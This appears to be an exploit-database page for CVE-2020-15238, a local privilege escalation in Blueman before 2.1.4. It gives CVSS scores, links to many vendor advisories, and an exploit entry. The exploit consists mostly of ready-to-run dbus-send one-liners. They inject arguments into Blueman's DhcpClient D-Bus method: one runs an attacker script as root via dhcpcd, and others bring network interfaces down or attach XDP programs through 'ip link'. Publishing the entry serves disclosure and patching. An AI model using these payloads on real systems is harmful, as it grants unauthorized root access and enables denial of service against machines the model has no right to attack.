Lucene search
Vaisha Bernard1337DAY-ID-35134HistoryOct 28, 2020 - 12:00 a.m.
Blueman < 2.1.4 - Local Privilege Escalation Vulnerability
2020-10-2800:00:00
Vaisha Bernard
0day.today
29
blueman
local privilege escalation
vulnerability
ubuntu
debian
exploit
dhcpcd
cve-2020-15238
isc-dhcp-client
dos
xdp
CVSS2
6.9
Attack Vector
LOCAL
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:M/Au:N/C:C/I:C/A:C
CVSS3
7.1
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
LOW
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:L
AI Score
6.8
Confidence
High
EPSS
0.001
Percentile
24.1%
# Exploit Title: Local Privilege Escalation in Blueman < 2.1.4
# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)
# Vendor Homepage: https://github.com/blueman-project/blueman
# Software Link: https://github.com/blueman-project/blueman
# Version: < 2.1.4
# Tested on: Ubuntu 20.04
# CVE: CVE-2020-15238
#
# By default installed on Ubuntu 16.04 - 20.10 and
# Debian 9 - 11
#
# Local root exploit when dhcpcd is used instead of dhclient
#
# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html
#
#
# The DhcpClient method of the d-bus interface to blueman-mechanism
# is prone to an argument injection vulnerability.
# On systems where the isc-dhcp-client package is removed
# and the dhcpcd package installed, this leads to Local
# Privilege Escalation to root from any unprivileged user.
# See attached python script for a working exploit. Or use
# this oneliner with a shellscript "/tmp/eye":
dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"-c/tmp/eye"
# This happens because the argument is not sanitized before
# being used as an argument to dhcpcd.
#
# Also on default installations with isc-dhcp-client installed,
# this can lead to DoS attacks by bringing any interface down
# as follows:
dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"ens33 down al"
# Or allows users to attach XDP objects to an interface:
dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"ens33 down al"
dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"ens33 name a"
dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"a xdp o /tmp/o"
# This both happens because the argument is passed to "ip link"
# unsanitized.
Related
nessus
nessus
GLSA-202011-11 : Blueman: Local privilege escalation
2020-11-12 00:00:00
openSUSE Security Update : blueman (openSUSE-2020-1997)
2020-11-23 00:00:00
Fedora 33 : 1:blueman (2020-7c22b25a07)
2020-11-06 00:00:00
nvd
nvd
CVE-2020-15238
2020-10-27 19:15:12
archlinux
archlinux
[ASA-202012-12] blueman: privilege escalation
2020-12-09 00:00:00
packetstorm
packetstorm
Blueman Local Root / Privilege Escalation
2020-10-28 00:00:00
mageia
mageia
Updated blueman packages fixes a security vulnerability
2020-11-08 17:14:27
suse
suse
Security update for blueman (moderate)
2020-11-26 00:00:00
Security update for blueman (moderate)
2020-11-23 00:00:00
debiancve
debiancve
CVE-2020-15238
2020-10-27 19:15:12
openvas
openvas
Debian: Security Advisory (DLA-2430-1)
2020-11-04 00:00:00
Ubuntu: Security Advisory (USN-4605-2)
2020-11-03 00:00:00
Mageia: Security Advisory (MGASA-2020-0402)
2022-01-28 00:00:00
debian
debian
[SECURITY] [DLA 2430-1] blueman security update
2020-11-03 09:47:22
[SECURITY] [DSA 4781-1] blueman security update
2020-10-27 18:38:35
prion
prion
Design/Logic Flaw
2020-10-27 19:15:00
exploitdb
exploitdb
Blueman < 2.1.4 - Local Privilege Escalation
2020-10-28 00:00:00
fedora
fedora
[SECURITY] Fedora 31 Update: blueman-2.1.4-1.fc31
2020-11-07 00:23:14
[SECURITY] Fedora 32 Update: blueman-2.1.4-1.fc32
2020-11-06 01:23:08
[SECURITY] Fedora 33 Update: blueman-2.1.4-1.fc33
2020-11-06 01:15:34
osv
osv
blueman vulnerability
2020-11-03 02:50:57
blueman - security update
2020-11-03 00:00:00
CVE-2020-15238
2020-10-27 19:15:12
cve
cve
CVE-2020-15238
2020-10-27 19:15:12
redhatcve
redhatcve
CVE-2020-15238
2022-05-20 23:16:20
veracode
veracode
Remote Code Execution (RCE)
2020-10-29 21:56:25
ubuntu
ubuntu
Blueman update
2020-11-03 00:00:00
Blueman vulnerability
2020-10-27 00:00:00
cvelist
cvelist
CVE-2020-15238 Local privilege escalation Blueman
2020-10-27 19:00:20
ubuntucve
ubuntucve
CVE-2020-15238
2020-10-27 00:00:00
gentoo
gentoo
Blueman: Local privilege escalation
2020-11-11 00:00:00
CVSS2
6.9
Attack Vector
LOCAL
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:M/Au:N/C:C/I:C/A:C
CVSS3
7.1
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
LOW
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:L
AI Score
6.8
Confidence
High
EPSS
0.001
Percentile
24.1%
Related for 1337DAY-ID-35134